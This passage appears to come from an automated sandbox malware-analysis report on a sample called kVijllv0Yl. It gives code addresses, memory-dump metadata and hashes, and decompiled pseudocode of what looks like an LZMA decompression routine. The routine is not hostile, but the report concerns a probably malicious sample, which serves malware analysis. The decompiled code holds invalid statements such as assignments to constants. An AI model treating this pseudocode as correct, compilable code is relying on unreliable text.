                  0x004063bc
                  0x004063c0
                  0x00406886
                  0x00406886
                  0x00000000
                  0x00406886
                  0x004063c6
                  0x004063c6
                  0x004063c9
                  0x004063cc
                  0x004063cf
                  0x004063d1
                  0x004063d1
                  0x004063d1
                  0x004063d4
                  0x004063d7
                  0x004063da
                  0x004063dd
                  0x004063e0
                  0x004063e3
                  0x004063e4
                  0x004063e6
                  0x004063e6
                  0x004063e6
                  0x004063e9
                  0x004063ec
                  0x004063ef
                  0x004063f2
                  0x004063f2
                  0x004063f2
                  0x004063f5
                  0x004063f7
                  0x004063f7
                  0x00000000
                  0x00000000
                  0x00406639
                  0x00406639
                  0x00406639
                  0x0040663d
                  0x00000000
                  0x00000000
                  0x00406643
                  0x00406643
                  0x00406646
                  0x00406649
                  0x0040664c
                  0x0040664e
                  0x0040664e
                  0x0040664e
                  0x00406651
                  0x00406654
                  0x00406657
                  0x0040665a
                  0x0040665d
                  0x00406660
                  0x00406661
                  0x00406663
                  0x00406663
                  0x00406663
                  0x00406666
                  0x00406669
                  0x0040666c
                  0x0040666f
                  0x00406672
                  0x00406676
                  0x00406678
                  0x0040667b
                  0x00000000
                  0x0040667d
                  0x0040667d
                  0x004063fa
                  0x004063fa
                  0x00000000
                  0x004063fa
                  0x0040667b
                  0x004068b0
                  0x004068b0
                  0x00000000
                  0x00000000
                  0x00405edf
                  0x004068e7
                  0x004068e7
                  0x00000000
                  0x004068e7
                  0x00406734
                  0x004067b4
                  0x0040677d

                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4704a5ed105780f6478b7403eb4dd8ec19d01cc9a077ced7c1a67cf9ab5ccc14
                  • Instruction ID: 5ae99ca79f71cc2638d3baaeb57d6c4ee888c8cbc78e3ce5cc4ffc2d3191f51a
                  • Opcode Fuzzy Hash: 4704a5ed105780f6478b7403eb4dd8ec19d01cc9a077ced7c1a67cf9ab5ccc14
                  • Instruction Fuzzy Hash: 1FA13571D00229CBDF28CFA8C854BADBBB1FF44305F15816AD816BB281D7785A86DF44
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 98%
                  			E00406682() {
                  				void _t533;
                  				signed int _t534;
                  				signed int _t535;
                  				signed int* _t605;
                  				void* _t612;
                  
                  				L0:
                  				while(1) {
                  					L0:
                  					if( *(_t612 - 0x40) != 0) {
                  						 *(_t612 - 0x84) = 0x13;
                  						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
                  						goto L132;
                  					} else {
                  						__eax =  *(__ebp - 0x4c);
                  						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                  						__ecx =  *(__ebp - 0x58);
                  						__eax =  *(__ebp - 0x4c) << 4;
                  						__eax =  *(__ebp - 0x58) + __eax + 4;
                  						L130:
                  						 *(__ebp - 0x58) = __eax;
                  						 *(__ebp - 0x40) = 3;
                  						L144:
                  						 *(__ebp - 0x7c) = 0x14;
                  						L145:
                  						__eax =  *(__ebp - 0x40);
                  						 *(__ebp - 0x50) = 1;
                  						 *(__ebp - 0x48) =  *(__ebp - 0x40);
                  						L149:
                  						if( *(__ebp - 0x48) <= 0) {
                  							__ecx =  *(__ebp - 0x40);
                  							__ebx =  *(__ebp - 0x50);
                  							0 = 1;
                  							__eax = 1 << __cl;
                  							__ebx =  *(__ebp - 0x50) - (1 << __cl);
                  							__eax =  *(__ebp - 0x7c);
                  							 *(__ebp - 0x44) = __ebx;
                  							while(1) {
                  								L140:
                  								 *(_t612 - 0x88) = _t533;
                  								while(1) {
                  									L1:
                  									_t534 =  *(_t612 - 0x88);
                  									if(_t534 > 0x1c) {
                  										break;
                  									}
                  									switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
                  										case 0:
                  											if( *(_t612 - 0x6c) == 0) {
                  												goto L170;
                  											}
                  											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                  											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                  											_t534 =  *( *(_t612 - 0x70));
                  											if(_t534 > 0xe1) {
                  												goto L171;
                  											}
                  											_t538 = _t534 & 0x000000ff;
                  											_push(0x2d);
                  											asm("cdq");
                  											_pop(_t569);
                  											_push(9);
                  											_pop(_t570);
                  											_t608 = _t538 / _t569;
                  											_t540 = _t538 % _t569 & 0x000000ff;
                  											asm("cdq");
                  											_t603 = _t540 % _t570 & 0x000000ff;
                  											 *(_t612 - 0x3c) = _t603;
                  											 *(_t612 - 0x1c) = (1 << _t608) - 1;
                  											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
                  											_t611 = (0x300 << _t603 + _t608) + 0x736;
                  											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
                  												L10:
                  												if(_t611 == 0) {
                  													L12:
                  													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
                  													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                  													goto L15;
                  												} else {
                  													goto L11;
                  												}
                  												do {
                  													L11:
                  													_t611 = _t611 - 1;
                  													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
                  												} while (_t611 != 0);
                  												goto L12;
                  											}
                  											if( *(_t612 - 4) != 0) {
                  												GlobalFree( *(_t612 - 4));
                  											}
                  											_t534 = GlobalAlloc(0x40, 0x600); // executed
                  											 *(_t612 - 4) = _t534;
                  											if(_t534 == 0) {
                  												goto L171;
                  											} else {
                  												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
                  												goto L10;
                  											}
                  										case 1:
                  											L13:
                  											__eflags =  *(_t612 - 0x6c);
                  											if( *(_t612 - 0x6c) == 0) {
                  												 *(_t612 - 0x88) = 1;
                  												goto L170;
                  											}
                  											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                  											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
                  											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                  											_t45 = _t612 - 0x48;
                  											 *_t45 =  *(_t612 - 0x48) + 1;
                  											__eflags =  *_t45;
                  											L15:
                  											if( *(_t612 - 0x48) < 4) {
                  												goto L13;
                  											}
                  											_t546 =  *(_t612 - 0x40);
                  											if(_t546 ==  *(_t612 - 0x74)) {
                  												L20:
                  												 *(_t612 - 0x48) = 5;
                  												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
                  												goto L23;
                  											}
                  											 *(_t612 - 0x74) = _t546;
                  											if( *(_t612 - 8) != 0) {
                  												GlobalFree( *(_t612 - 8));
                  											}
                  											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
                  											 *(_t612 - 8) = _t534;
                  											if(_t534 == 0) {
                  												goto L171;
                  											} else {
                  												goto L20;
                  											}
                  										case 2:
                  											L24:
                  											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
                  											 *(_t612 - 0x84) = 6;
                  											 *(_t612 - 0x4c) = _t553;
                  											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
                  											goto L132;
                  										case 3:
                  											L21:
                  											__eflags =  *(_t612 - 0x6c);
                  											if( *(_t612 - 0x6c) == 0) {
                  												 *(_t612 - 0x88) = 3;
                  												goto L170;
                  											}
                  											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                  											_t67 = _t612 - 0x70;
                  											 *_t67 =  &(( *(_t612 - 0x70))[1]);
                  											__eflags =  *_t67;
                  											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                  											L23:
                  											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
                  											if( *(_t612 - 0x48) != 0) {
                  												goto L21;
                  											}
                  											goto L24;
                  										case 4:
                  											L133:
                  											_t531 =  *_t605;
                  											_t588 = _t531 & 0x0000ffff;
                  											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
                  											if( *(_t612 - 0xc) >= _t564) {
                  												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
                  												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
                  												 *(_t612 - 0x40) = 1;
                  												_t532 = _t531 - (_t531 >> 5);
                  												__eflags = _t532;
                  												 *_t605 = _t532;
                  											} else {
                  												 *(_t612 - 0x10) = _t564;
                  												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                  												 *_t605 = (0x800 - _t588 >> 5) + _t531;
                  											}
                  											if( *(_t612 - 0x10) >= 0x1000000) {
                  												goto L139;
                  											} else {
                  												goto L137;
                  											}
                  										case 5:
                  											L137:
                  											if( *(_t612 - 0x6c) == 0) {
                  												 *(_t612 - 0x88) = 5;
                  												goto L170;
                  											}
                  											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
                  											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                  											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                  											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                  											L139:
                  											_t533 =  *(_t612 - 0x84);
                  											goto L140;
                  										case 6:
                  											__edx = 0;
                  											__eflags =  *(__ebp - 0x40);
                  											if( *(__ebp - 0x40) != 0) {
                  												__eax =  *(__ebp - 4);
                  												__ecx =  *(__ebp - 0x38);
                  												 *(__ebp - 0x34) = 1;
                  												 *(__ebp - 0x84) = 7;
                  												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                  												goto L132;
                  											}
                  											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                  											__esi =  *(__ebp - 0x60);
                  											__cl = 8;
                  											__cl = 8 -  *(__ebp - 0x3c);
                  											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                  											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                  											__ecx =  *(__ebp - 0x3c);
                  											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                  											__ecx =  *(__ebp - 4);
                  											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                  											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                  											__eflags =  *(__ebp - 0x38) - 4;
                  											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                  											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                  											if( *(__ebp - 0x38) >= 4) {
                  												__eflags =  *(__ebp - 0x38) - 0xa;
                  												if( *(__ebp - 0x38) >= 0xa) {
                  													_t98 = __ebp - 0x38;
                  													 *_t98 =  *(__ebp - 0x38) - 6;
                  													__eflags =  *_t98;
                  												} else {
                  													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                  												}
                  											} else {
                  												 *(__ebp - 0x38) = 0;
                  											}
                  											__eflags =  *(__ebp - 0x34) - __edx;
                  											if( *(__ebp - 0x34) == __edx) {
                  												__ebx = 0;
                  												__ebx = 1;
                  												goto L61;
                  											} else {
                  												__eax =  *(__ebp - 0x14);
                  												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                  												__eflags = __eax -  *(__ebp - 0x74);
                  												if(__eax >=  *(__ebp - 0x74)) {
                  													__eax = __eax +  *(__ebp - 0x74);
                  													__eflags = __eax;
                  												}
                  												__ecx =  *(__ebp - 8);
                  												__ebx = 0;
                  												__ebx = 1;
                  												__al =  *((intOrPtr*)(__eax + __ecx));
                  												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                  												goto L41;
                  											}
                  										case 7:
                  											__eflags =  *(__ebp - 0x40) - 1;
                  											if( *(__ebp - 0x40) != 1) {
                  												__eax =  *(__ebp - 0x24);
                  												 *(__ebp - 0x80) = 0x16;
                  												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                  												__eax =  *(__ebp - 0x28);
                  												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                  												__eax =  *(__ebp - 0x2c);
                  												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                  												__eax = 0;
                  												__eflags =  *(__ebp - 0x38) - 7;
                  												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                  												__al = __al & 0x000000fd;
                  												__eax = (__eflags >= 0) - 1 + 0xa;
                  												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                  												__eax =  *(__ebp - 4);
                  												__eax =  *(__ebp - 4) + 0x664;
                  												__eflags = __eax;
                  												 *(__ebp - 0x58) = __eax;
                  												goto L69;
                  											}
                  											__eax =  *(__ebp - 4);
                  											__ecx =  *(__ebp - 0x38);
                  											 *(__ebp - 0x84) = 8;
                  											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                  											goto L132;
                  										case 8:
                  											__eflags =  *(__ebp - 0x40);
                  											if( *(__ebp - 0x40) != 0) {
                  												__eax =  *(__ebp - 4);
                  												__ecx =  *(__ebp - 0x38);
                  												 *(__ebp - 0x84) = 0xa;
                  												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                  											} else {
                  												__eax =  *(__ebp - 0x38);
                  												__ecx =  *(__ebp - 4);
                  												__eax =  *(__ebp - 0x38) + 0xf;
                  												 *(__ebp - 0x84) = 9;
                  												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                  												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                  											}
                  											goto L132;
                  										case 9:
                  											__eflags =  *(__ebp - 0x40);
                  											if( *(__ebp - 0x40) != 0) {
                  												goto L90;
                  											}
                  											__eflags =  *(__ebp - 0x60);
                  											if( *(__ebp - 0x60) == 0) {
                  												goto L171;
                  											}
                  											__eax = 0;
                  											__eflags =  *(__ebp - 0x38) - 7;
                  											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                  											__eflags = _t259;
                  											0 | _t259 = _t259 + _t259 + 9;
                  											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                  											goto L76;
                  										case 0xa:
                  											__eflags =  *(__ebp - 0x40);
                  											if( *(__ebp - 0x40) != 0) {
                  												__eax =  *(__ebp - 4);
                  												__ecx =  *(__ebp - 0x38);
                  												 *(__ebp - 0x84) = 0xb;
                  												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                  												goto L132;
                  											}
                  											__eax =  *(__ebp - 0x28);
                  											goto L89;
                  										case 0xb:
                  											__eflags =  *(__ebp - 0x40);
                  											if( *(__ebp - 0x40) != 0) {
                  												__ecx =  *(__ebp - 0x24);
                  												__eax =  *(__ebp - 0x20);
                  												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                  											} else {
                  												__eax =  *(__ebp - 0x24);
                  											}
                  											__ecx =  *(__ebp - 0x28);
                  											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                  											L89:
                  											__ecx =  *(__ebp - 0x2c);
                  											 *(__ebp - 0x2c) = __eax;
                  											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                  											L90:
                  											__eax =  *(__ebp - 4);
                  											 *(__ebp - 0x80) = 0x15;
                  											__eax =  *(__ebp - 4) + 0xa68;
                  											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                  											goto L69;
                  										case 0xc:
                  											L100:
                  											__eflags =  *(__ebp - 0x6c);
                  											if( *(__ebp - 0x6c) == 0) {
                  												 *(__ebp - 0x88) = 0xc;
                  												goto L170;
                  											}
                  											__ecx =  *(__ebp - 0x70);
                  											__eax =  *(__ebp - 0xc);
                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                  											_t335 = __ebp - 0x70;
                  											 *_t335 =  *(__ebp - 0x70) + 1;
                  											__eflags =  *_t335;
                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                  											__eax =  *(__ebp - 0x2c);
                  											goto L102;
                  										case 0xd:
                  											L37:
                  											__eflags =  *(__ebp - 0x6c);
                  											if( *(__ebp - 0x6c) == 0) {
                  												 *(__ebp - 0x88) = 0xd;
                  												goto L170;
                  											}
                  											__ecx =  *(__ebp - 0x70);
                  											__eax =  *(__ebp - 0xc);
                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                  											_t122 = __ebp - 0x70;
                  											 *_t122 =  *(__ebp - 0x70) + 1;
                  											__eflags =  *_t122;
                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                  											L39:
                  											__eax =  *(__ebp - 0x40);
                  											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                  											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                  												goto L48;
                  											}
                  											__eflags = __ebx - 0x100;
                  											if(__ebx >= 0x100) {
                  												goto L54;
                  											}
                  											L41:
                  											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                  											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                  											__ecx =  *(__ebp - 0x58);
                  											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                  											 *(__ebp - 0x48) = __eax;
                  											__eax = __eax + 1;
                  											__eax = __eax << 8;
                  											__eax = __eax + __ebx;
                  											__esi =  *(__ebp - 0x58) + __eax * 2;
                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                  											__ax =  *__esi;
                  											 *(__ebp - 0x54) = __esi;
                  											__edx = __ax & 0x0000ffff;
                  											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                  											__eflags =  *(__ebp - 0xc) - __ecx;
                  											if( *(__ebp - 0xc) >= __ecx) {
                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                  												__cx = __ax;
                  												 *(__ebp - 0x40) = 1;
                  												__cx = __ax >> 5;
                  												__eflags = __eax;
                  												__ebx = __ebx + __ebx + 1;
                  												 *__esi = __ax;
                  											} else {
                  												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                  												 *(__ebp - 0x10) = __ecx;
                  												0x800 = 0x800 - __edx;
                  												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                  												__ebx = __ebx + __ebx;
                  												 *__esi = __cx;
                  											}
                  											__eflags =  *(__ebp - 0x10) - 0x1000000;
                  											 *(__ebp - 0x44) = __ebx;
                  											if( *(__ebp - 0x10) >= 0x1000000) {
                  												goto L39;
                  											} else {
                  												goto L37;
                  											}
                  										case 0xe:
                  											L46:
                  											__eflags =  *(__ebp - 0x6c);
                  											if( *(__ebp - 0x6c) == 0) {
                  												 *(__ebp - 0x88) = 0xe;
                  												goto L170;
                  											}
                  											__ecx =  *(__ebp - 0x70);
                  											__eax =  *(__ebp - 0xc);
                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                  											_t156 = __ebp - 0x70;
                  											 *_t156 =  *(__ebp - 0x70) + 1;
                  											__eflags =  *_t156;
                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                  											while(1) {
                  												L48:
                  												__eflags = __ebx - 0x100;
                  												if(__ebx >= 0x100) {
                  													break;
                  												}
                  												__eax =  *(__ebp - 0x58);
                  												__edx = __ebx + __ebx;
                  												__ecx =  *(__ebp - 0x10);
                  												__esi = __edx + __eax;
                  												__ecx =  *(__ebp - 0x10) >> 0xb;
                  												__ax =  *__esi;
                  												 *(__ebp - 0x54) = __esi;
                  												__edi = __ax & 0x0000ffff;
                  												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                  												__eflags =  *(__ebp - 0xc) - __ecx;
                  												if( *(__ebp - 0xc) >= __ecx) {
                  													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                  													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                  													__cx = __ax;
                  													_t170 = __edx + 1; // 0x1
                  													__ebx = _t170;
                  													__cx = __ax >> 5;
                  													__eflags = __eax;
                  													 *__esi = __ax;
                  												} else {
                  													 *(__ebp - 0x10) = __ecx;
                  													0x800 = 0x800 - __edi;
                  													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                  													__ebx = __ebx + __ebx;
                  													 *__esi = __cx;
                  												}
                  												__eflags =  *(__ebp - 0x10) - 0x1000000;
                  												 *(__ebp - 0x44) = __ebx;
                  												if( *(__ebp - 0x10) >= 0x1000000) {
                  													continue;
                  												} else {
                  													goto L46;
                  												}
                  											}
                  											L54:
                  											_t173 = __ebp - 0x34;
                  											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                  											__eflags =  *_t173;
                  											goto L55;
                  										case 0xf:
                  											L58:
                  											__eflags =  *(__ebp - 0x6c);
                  											if( *(__ebp - 0x6c) == 0) {
                  												 *(__ebp - 0x88) = 0xf;
                  												goto L170;
                  											}
                  											__ecx =  *(__ebp - 0x70);
                  											__eax =  *(__ebp - 0xc);
                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                  											_t203 = __ebp - 0x70;
                  											 *_t203 =  *(__ebp - 0x70) + 1;
                  											__eflags =  *_t203;
                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                  											L60:
                  											__eflags = __ebx - 0x100;
                  											if(__ebx >= 0x100) {
                  												L55:
                  												__al =  *(__ebp - 0x44);
                  												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                  												goto L56;
                  											}
                  											L61:
                  											__eax =  *(__ebp - 0x58);
                  											__edx = __ebx + __ebx;
                  											__ecx =  *(__ebp - 0x10);
                  											__esi = __edx + __eax;
                  											__ecx =  *(__ebp - 0x10) >> 0xb;
                  											__ax =  *__esi;
                  											 *(__ebp - 0x54) = __esi;
                  											__edi = __ax & 0x0000ffff;
                  											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                  											__eflags =  *(__ebp - 0xc) - __ecx;
                  											if( *(__ebp - 0xc) >= __ecx) {
                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                  												__cx = __ax;
                  												_t217 = __edx + 1; // 0x1
                  												__ebx = _t217;
                  												__cx = __ax >> 5;
                  												__eflags = __eax;
                  												 *__esi = __ax;
                  											} else {
                  												 *(__ebp - 0x10) = __ecx;
                  												0x800 = 0x800 - __edi;
                  												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                  												__ebx = __ebx + __ebx;
                  												 *__esi = __cx;
                  											}
                  											__eflags =  *(__ebp - 0x10) - 0x1000000;
                  											 *(__ebp - 0x44) = __ebx;
                  											if( *(__ebp - 0x10) >= 0x1000000) {
                  												goto L60;
                  											} else {
                  												goto L58;
                  											}
                  										case 0x10:
                  											L110:
                  											__eflags =  *(__ebp - 0x6c);
                  											if( *(__ebp - 0x6c) == 0) {
                  												 *(__ebp - 0x88) = 0x10;
                  												goto L170;
                  											}
                  											__ecx =  *(__ebp - 0x70);
                  											__eax =  *(__ebp - 0xc);
                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                  											_t366 = __ebp - 0x70;
                  											 *_t366 =  *(__ebp - 0x70) + 1;
                  											__eflags =  *_t366;
                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                  											goto L112;
                  										case 0x11:
                  											L69:
                  											__esi =  *(__ebp - 0x58);
                  											 *(__ebp - 0x84) = 0x12;
                  											L132:
                  											 *(_t612 - 0x54) = _t605;
                  											goto L133;
                  										case 0x12:
                  											goto L0;
                  										case 0x13:
                  											__eflags =  *(__ebp - 0x40);
                  											if( *(__ebp - 0x40) != 0) {
                  												_t469 = __ebp - 0x58;
                  												 *_t469 =  *(__ebp - 0x58) + 0x204;
                  												__eflags =  *_t469;
                  												 *(__ebp - 0x30) = 0x10;
                  												 *(__ebp - 0x40) = 8;
                  												goto L144;
                  											}
                  											__eax =  *(__ebp - 0x4c);
                  											__ecx =  *(__ebp - 0x58);
                  											__eax =  *(__ebp - 0x4c) << 4;
                  											 *(__ebp - 0x30) = 8;
                  											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                  											goto L130;
                  										case 0x14:
                  											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                  											__eax =  *(__ebp - 0x80);
                  											L140:
                  											 *(_t612 - 0x88) = _t533;
                  											goto L1;
                  										case 0x15:
                  											__eax = 0;
                  											__eflags =  *(__ebp - 0x38) - 7;
                  											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                  											__al = __al & 0x000000fd;
                  											__eax = (__eflags >= 0) - 1 + 0xb;
                  											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                  											goto L121;
                  										case 0x16:
                  											__eax =  *(__ebp - 0x30);
                  											__eflags = __eax - 4;
                  											if(__eax >= 4) {
                  												_push(3);
                  												_pop(__eax);
                  											}
                  											__ecx =  *(__ebp - 4);
                  											 *(__ebp - 0x40) = 6;
                  											__eax = __eax << 7;
                  											 *(__ebp - 0x7c) = 0x19;
                  											 *(__ebp - 0x58) = __eax;
                  											goto L145;
                  										case 0x17:
                  											goto L145;
                  										case 0x18:
                  											L146:
                  											__eflags =  *(__ebp - 0x6c);
                  											if( *(__ebp - 0x6c) == 0) {
                  												 *(__ebp - 0x88) = 0x18;
                  												goto L170;
                  											}
                  											__ecx =  *(__ebp - 0x70);
                  											__eax =  *(__ebp - 0xc);
                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                  											_t484 = __ebp - 0x70;
                  											 *_t484 =  *(__ebp - 0x70) + 1;
                  											__eflags =  *_t484;
